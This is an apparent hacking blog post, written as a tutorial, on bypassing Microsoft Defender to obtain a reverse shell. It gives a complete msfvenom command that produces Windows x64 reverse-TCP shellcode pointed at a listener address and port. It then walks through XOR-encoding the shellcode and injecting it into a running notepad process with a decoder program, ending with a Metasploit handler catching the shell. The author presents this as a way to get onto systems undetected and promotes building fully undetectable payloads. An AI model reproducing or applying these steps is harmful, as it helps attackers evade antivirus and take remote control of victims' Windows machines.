Bypass Defender (Simple Trick)

Introduction:

Hey guys, I am back with another blog. In this one I will show you how to bypass Defender and get a reverse shell using a simple trick. This trick is known to be used by many attackers to get onto a system without being caught. Let's jump in.


Getting Reverse Shell: 

This simple technique has been around in the community for a long time and there are many variants of it. The basic idea is that it takes the shellcode, XOR-encodes it, and decodes and runs it directly in memory, so the plaintext payload that Defender's static signatures would match never sits on disk. Another variant is to encrypt the shellcode and then run it from memory the same way, but I will cover that in the next blog.

I'll be using the Shellcode-In-Memory Decoder injector tool from GitHub. It is a great tool and I have been using it for my experiments lately.

 

Generate shellcode from msfvenom: 

msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.11.11 LPORT=4444 -f py

When you download the program from GitHub you will find the xor-encode.py script. Copy the generated shellcode into that Python script and run it; it will output the XOR-encoded shellcode.



Now copy the encoded shellcode into the decoder.c program and compile it. I am using Dev-C++ to compile the program; you can use whichever compiler you're comfortable with.

decoder.c basically takes the encoded shellcode, decodes it, writes it into the target process byte by byte and then executes the shellcode there. Let's start the Metasploit multi/handler module first:

I will inject the shellcode into the notepad process. Use Get-Process to get its PID and run the decoder.exe program with it:

./decoder.exe <PID>


And we got a reverse shell while Defender was running.

 

Conclusion:

I have been writing fully undetectable (FUD) payloads and custom encoders, but I cannot give those away. I will keep sharing the basics and other techniques that can lead you to develop your own FUD payloads. Till next time :)